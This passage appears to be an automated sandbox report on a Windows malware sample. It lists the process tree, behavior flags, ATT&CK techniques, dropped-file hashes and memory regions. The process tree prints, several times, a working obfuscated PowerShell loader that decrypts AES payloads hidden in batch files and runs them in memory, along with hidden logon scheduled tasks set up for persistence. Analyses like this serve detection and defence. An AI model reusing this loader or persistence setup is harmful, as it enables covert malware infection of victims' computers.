      C:\Windows\system32\net1 file
      4⤵
      PID:4724
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('FUnCUHbp7bZ3aDt7EaVZSvFYhobW2XMUVK66Zb99X4Q='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('7RSYmNKHEzHJb8J9Ope6aQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $FmbNL=New-Object System.IO.MemoryStream(,$param_var); $RglAC=New-Object System.IO.MemoryStream; $acWbi=New-Object System.IO.Compression.GZipStream($FmbNL, [IO.Compression.CompressionMode]::Decompress); $acWbi.CopyTo($RglAC); $acWbi.Dispose(); $FmbNL.Dispose(); $RglAC.Dispose(); $RglAC.ToArray();}function execute_function($param_var,$param2_var){ $IsgCr=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $WIgyd=$IsgCr.EntryPoint; $WIgyd.Invoke($null, $param2_var);}$coheU = 'C:\Users\Admin\AppData\Local\Temp\VMenu3.121fix1.bat';$host.UI.RawUI.WindowTitle = $coheU;$MuzzS=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($coheU).Split([Environment]::NewLine);foreach ($rWFCs in $MuzzS) { if ($rWFCs.StartsWith('AXBwvMvJcDRzRiGDBjAF')) { $FODgs=$rWFCs.Substring(20); break; }}$payloads_var=[string[]]$FODgs.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
    3⤵
    PID:3660
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Modifies registry class
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:540
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'Windows_Log_473_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Windows_Log_473.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2836
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\Windows_Log_473.vbs"
      4⤵
      Checks computer location settings
      Suspicious use of WriteProcessMemory
      PID:1492
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Windows_Log_473.bat" "
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:3988
      - C:\Windows\system32\net.exe
        
        net file
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:2080
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 file
        7⤵
        
        PID:3452
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('FUnCUHbp7bZ3aDt7EaVZSvFYhobW2XMUVK66Zb99X4Q='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('7RSYmNKHEzHJb8J9Ope6aQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $FmbNL=New-Object System.IO.MemoryStream(,$param_var); $RglAC=New-Object System.IO.MemoryStream; $acWbi=New-Object System.IO.Compression.GZipStream($FmbNL, [IO.Compression.CompressionMode]::Decompress); $acWbi.CopyTo($RglAC); $acWbi.Dispose(); $FmbNL.Dispose(); $RglAC.Dispose(); $RglAC.ToArray();}function execute_function($param_var,$param2_var){ $IsgCr=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $WIgyd=$IsgCr.EntryPoint; $WIgyd.Invoke($null, $param2_var);}$coheU = 'C:\Users\Admin\AppData\Roaming\Windows_Log_473.bat';$host.UI.RawUI.WindowTitle = $coheU;$MuzzS=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($coheU).Split([Environment]::NewLine);foreach ($rWFCs in $MuzzS) { if ($rWFCs.StartsWith('AXBwvMvJcDRzRiGDBjAF')) { $FODgs=$rWFCs.Substring(20); break; }}$payloads_var=[string[]]$FODgs.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
        6⤵
        
        PID:2300
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
        6⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of WriteProcessMemory
        
        PID:3088
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\VClient3.11.bat" "
        7⤵
        Suspicious use of WriteProcessMemory
        
        PID:4328
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('C13MerJf76R1DFIOGLoO10xEJRdtouLHDV1tgJ/4w50='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('See+TWm/7iu6WCsg7gNt1g=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $snUzJ=New-Object System.IO.MemoryStream(,$param_var); $lTkza=New-Object System.IO.MemoryStream; $UKwbD=New-Object System.IO.Compression.GZipStream($snUzJ, [IO.Compression.CompressionMode]::Decompress); $UKwbD.CopyTo($lTkza); $UKwbD.Dispose(); $snUzJ.Dispose(); $lTkza.Dispose(); $lTkza.ToArray();}function execute_function($param_var,$param2_var){ $Oejaz=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $xiCYv=$Oejaz.EntryPoint; $xiCYv.Invoke($null, $param2_var);}$TAeoL = 'C:\Users\Admin\AppData\Local\Temp\VClient3.11.bat';$host.UI.RawUI.WindowTitle = $TAeoL;$Cruwh=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($TAeoL).Split([Environment]::NewLine);foreach ($luPpZ in $Cruwh) { if ($luPpZ.StartsWith('afBvfWMFjSuStgRofcsT')) { $RHTbA=$luPpZ.Substring(20); break; }}$payloads_var=[string[]]$RHTbA.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
        8⤵
        
        PID:3492
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
        8⤵
        Modifies registry class
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of WriteProcessMemory
        
        PID:636
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName '$phantom-RuntimeBroker_startup_81_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\$phantom-startup_str_81.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
        9⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:4900
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\$phantom-startup_str_81.vbs"
        9⤵
        Checks computer location settings
        Suspicious use of WriteProcessMemory
        
        PID:4076
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\$phantom-startup_str_81.bat" "
        10⤵
        Suspicious use of WriteProcessMemory
        
        PID:1700
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('C13MerJf76R1DFIOGLoO10xEJRdtouLHDV1tgJ/4w50='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('See+TWm/7iu6WCsg7gNt1g=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $snUzJ=New-Object System.IO.MemoryStream(,$param_var); $lTkza=New-Object System.IO.MemoryStream; $UKwbD=New-Object System.IO.Compression.GZipStream($snUzJ, [IO.Compression.CompressionMode]::Decompress); $UKwbD.CopyTo($lTkza); $UKwbD.Dispose(); $snUzJ.Dispose(); $lTkza.Dispose(); $lTkza.ToArray();}function execute_function($param_var,$param2_var){ $Oejaz=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $xiCYv=$Oejaz.EntryPoint; $xiCYv.Invoke($null, $param2_var);}$TAeoL = 'C:\Users\Admin\AppData\Roaming\$phantom-startup_str_81.bat';$host.UI.RawUI.WindowTitle = $TAeoL;$Cruwh=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($TAeoL).Split([Environment]::NewLine);foreach ($luPpZ in $Cruwh) { if ($luPpZ.StartsWith('afBvfWMFjSuStgRofcsT')) { $RHTbA=$luPpZ.Substring(20); break; }}$payloads_var=[string[]]$RHTbA.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
        11⤵
        
        PID:3188
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
        11⤵
        Blocklisted process makes network request
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of WriteProcessMemory
        
        PID:3684
        
        C:\Windows\system32\WerFault.exe
        
        C:\Windows\system32\WerFault.exe -u -p 3684 -s 2928
        12⤵
        
        PID:3004

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
1⤵
PID:3412

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
1⤵
PID:3568

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
1⤵
PID:5076

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
1⤵
PID:740

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
1⤵
- Modifies data under HKEY_USERS
PID:2536

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
1⤵
PID:5048

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
1⤵
- Modifies data under HKEY_USERS
PID:5108

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
1⤵
PID:3000

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
1⤵
PID:2464

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k WerSvcGroup
1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious behavior: EnumeratesProcesses
PID:1572
- C:\Windows\system32\WerFault.exe
  C:\Windows\system32\WerFault.exe -pss -s 412 -p 3684 -ip 3684
  2⤵
  PID:3424

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
1⤵
PID:5004

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
661739d384d9dfd807a089721202900b

SHA1
5b2c5d6a7122b4ce849dc98e79a7713038feac55

SHA256
70c3ecbaa6df88e88df4efc70968502955e890a2248269641c4e2d4668ef61bf

SHA512
81b48ae5c4064c4d9597303d913e32d3954954ba1c8123731d503d1653a0d848856812d2ee6951efe06b1db2b91a50e5d54098f60c26f36bc8390203f4c8a2d8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

Filesize
2KB

MD5
005bc2ef5a9d890fb2297be6a36f01c2

SHA1
0c52adee1316c54b0bfdc510c0963196e7ebb430

SHA256
342544f99b409fd415b305cb8c2212c3e1d95efc25e78f6bf8194e866ac45b5d

SHA512
f8aadbd743495d24d9476a5bb12c8f93ffb7b3cc8a8c8ecb49fd50411330c676c007da6a3d62258d5f13dd5dacc91b28c5577f7fbf53c090b52e802f5cc4ea22

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

Filesize
2KB

MD5
dfd76671b8ea3c92750167702bc132e4

SHA1
0f91248a408f2e9a27e0a5a2d4a645345cf0a9ff

SHA256
5b748f4d3658eeae65c570ce47ea8dcb298ee727c2ad6335ead28bd39f6a0e1f

SHA512
d0e123940fdb163240d9ff53390d45efcbb058bc5c7bf01aeb5f4e08d2e4a18f3ef5d97e5d87f04a73bd058631704d523c78b75e5f52f0136314bb356124e3ea

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
075fa5ba7105d9c3a17ffcb83d1ba281

SHA1
8323b1393fdd0f1a99d5ef3608054fd3df2d8b0d

SHA256
38ab1d399477c6a57b768fb9ee9800979cfab1de5fe066c2a7d8335aeab54dc6

SHA512
0510205b524c5e6d4eb10366ff92f51136963f1d18d3653c560e4c7c7b5cc8a71a22ba0b92618452a7fedb645cb60518f45e58022758b30079ab83428cdbdc60

Download Submit
C:\Users\Admin\AppData\Local\Temp\VClient3.11.bat

Filesize
422KB

MD5
869440ffbff098f2805f2bc6ddd1a9f5

SHA1
85bac325a849358f534772363d8d3b5b7f7e91c7

SHA256
18baa5efa951d971177b202c4e92aea450f1fd7ed13b5c629e3d68340fd0a4e9

SHA512
5754c683da58fc952f804eff82cf4aedc4fdd2ea9e38a1c534ae4b894f58926ffdd13645ed781ad4fdc7318e705a03ec67edc47dc90a0619056618d18df3815a

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_qnx3bhom.afd.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\$phantom-startup_str_81.vbs

Filesize
123B

MD5
2df569ee42dcec73283be6955bcad991

SHA1
187da2d8df905ef84612445cf325143fae415988

SHA256
5f39e6118bc7a33b07e82d43a4296f0ef1070686e1a3e989109cc4c47d132e75

SHA512
721db43ad9fc58178a8a4c5d8079c9bbd0433e43563241c0b239538cc7ac53925ba673d54496ff608742f2812984c38af17e1c7256a67c63c41a955ec1785302

Download Submit
C:\Users\Admin\AppData\Roaming\Windows_Log_473.bat

Filesize
527KB

MD5
3d1653ee332959fc6ea17400cdb636bd

SHA1
3a75f6b73477b63300bc1065caaa7c9af066b6b4

SHA256
fdb0641302824a729dcdbf6235a60a7661ee14951f82cc486cf0a874e8c38e1e

SHA512
6eaaf2c0cd2322dcb9fcd71d030afaabaf13b0ed881fafe8db569da5cb2e196147045105067b3d5dc9aa80d2c61d44d6f063b82c74f6954b5bb956e4597e0b06

Download Submit
C:\Users\Admin\AppData\Roaming\Windows_Log_473.vbs

Filesize
115B

MD5
10077a077a354f3d9d11e6e91643afab

SHA1
0d65aa9d2852ebcf81806a78b61bc74a4a0231b9

SHA256
4af83e6fa742791dce7a4e53075dffccb26350a75d406643fd97da82d32a61a6

SHA512
6aa6ef11e742037726396ec06ebc63145595f09f1ddbcbcb384377215510214359989012753e7b669e847a9b51bfbabfb339dde9df187668ac5ed0a6188ec207

Download Submit
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work

Filesize
2KB

MD5
ceb7caa4e9c4b8d760dbf7e9e5ca44c5

SHA1
a3879621f9493414d497ea6d70fbf17e283d5c08

SHA256
98c054088df4957e8d6361fd2539c219bcf35f8a524aad8f5d1a95f218e990e9

SHA512
1eddfbf4cb62d3c5b4755a371316304aaeabb00f01bad03fb4f925a98a2f0824f613537d86deddd648a74d694dc13ed5183e761fdc1ec92589f6fa28beb7fbff

Download Submit
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work

Filesize
2KB

MD5
7d612892b20e70250dbd00d0cdd4f09b

SHA1
63251cfa4e5d6cbf6fb14f6d8a7407dbe763d3f5

SHA256
727c9e7b91e144e453d5b32e18f12508ee84dabe71bc852941d9c9b4923f9e02

SHA512
f8d481f3300947d49ce5ab988a9d4e3154746afccc97081cbed1135ffb24fc107203d485dda2d5d714e74e752c614d8cfd16781ea93450fe782ffae3f77066d1

Download Submit
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work

Filesize
2KB

MD5
0b990e24f1e839462c0ac35fef1d119e

SHA1
9e17905f8f68f9ce0a2024d57b537aa8b39c6708

SHA256
a1106ed0845cd438e074344e0fe296dc10ee121a0179e09398eaaea2357c614a

SHA512
c65ba42fc0a2cb0b70888beb8ca334f7d5a8eaf954a5ef7adaecbcb4ce8d61b34858dfd9560954f95f59b4d8110a79ceaa39088b6a0caf8b42ceda41b46ec4a4

Download Submit
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work

Filesize
2KB

MD5
1e8e2076314d54dd72e7ee09ff8a52ab

SHA1
5fd0a67671430f66237f483eef39ff599b892272

SHA256
55f203d6b40a39a6beba9dd3a2cb9034284f49578009835dd4f0f8e1db6ebe2f

SHA512
5b0c97284923c4619d9c00cba20ce1c6d65d1826abe664c390b04283f7a663256b4a6efe51f794cb5ec82ccea80307729addde841469da8d041cbcfd94feb0f6

Download Submit
memory/540-52-0x00007FFAB2B90000-0x00007FFAB3651000-memory.dmp

Filesize
10.8MB

Download
memory/540-15-0x000001B83C8B0000-0x000001B83C8B8000-memory.dmp

Filesize
32KB

Download
memory/540-16-0x000001B83CCB0000-0x000001B83CD30000-memory.dmp

Filesize
512KB

Download
memory/540-0-0x00007FFAB2B93000-0x00007FFAB2B95000-memory.dmp

Filesize
8KB

Download
memory/540-13-0x000001B83CC60000-0x000001B83CCA4000-memory.dmp

Filesize
272KB

Download
memory/540-12-0x00007FFAB2B90000-0x00007FFAB3651000-memory.dmp

Filesize
10.8MB

Download
memory/540-11-0x00007FFAB2B90000-0x00007FFAB3651000-memory.dmp

Filesize
10.8MB

Download
memory/540-1-0x000001B822560000-0x000001B822582000-memory.dmp

Filesize
136KB

Download
memory/540-14-0x000001B83CD30000-0x000001B83CDA6000-memory.dmp

Filesize
472KB

Download
memory/636-63-0x000001916FA10000-0x000001916FA62000-memory.dmp

Filesize
328KB

Download
memory/636-62-0x000001916F680000-0x000001916F688000-memory.dmp

Filesize
32KB

Download
memory/924-151-0x00007FFA91BB0000-0x00007FFA91BC0000-memory.dmp

Filesize
64KB

Download
memory/1136-149-0x00007FFA91BB0000-0x00007FFA91BC0000-memory.dmp

Filesize
64KB

Download
memory/1172-145-0x00007FFA91BB0000-0x00007FFA91BC0000-memory.dmp

Filesize
64KB

Download
memory/1428-150-0x00007FFA91BB0000-0x00007FFA91BC0000-memory.dmp

Filesize
64KB

Download
memory/1436-156-0x00007FFA91BB0000-0x00007FFA91BC0000-memory.dmp

Filesize
64KB

Download
memory/1572-144-0x00007FFA91BB0000-0x00007FFA91BC0000-memory.dmp

Filesize
64KB

Download
memory/1720-155-0x00007FFA91BB0000-0x00007FFA91BC0000-memory.dmp

Filesize
64KB

Download
memory/2144-148-0x00007FFA91BB0000-0x00007FFA91BC0000-memory.dmp

Filesize
64KB

Download
memory/2324-152-0x00007FFA91BB0000-0x00007FFA91BC0000-memory.dmp

Filesize
64KB

Download
memory/2560-147-0x00007FFA91BB0000-0x00007FFA91BC0000-memory.dmp

Filesize
64KB

Download
memory/3088-48-0x000001645D380000-0x000001645D3D8000-memory.dmp

Filesize
352KB

Download
memory/3396-143-0x00007FFA91BB0000-0x00007FFA91BC0000-memory.dmp

Filesize
64KB

Download
memory/3396-93-0x0000000008770000-0x000000000879A000-memory.dmp

Filesize
168KB

Download
memory/3568-146-0x00007FFA91BB0000-0x00007FFA91BC0000-memory.dmp

Filesize
64KB

Download
memory/3684-92-0x000001BBD4EC0000-0x000001BBD4F12000-memory.dmp

Filesize
328KB

Download
memory/5004-153-0x00007FFA91BB0000-0x00007FFA91BC0000-memory.dmp

Filesize
64KB

Download
memory/5048-154-0x00007FFA91BB0000-0x00007FFA91BC0000-memory.dmp

Filesize
64KB

Download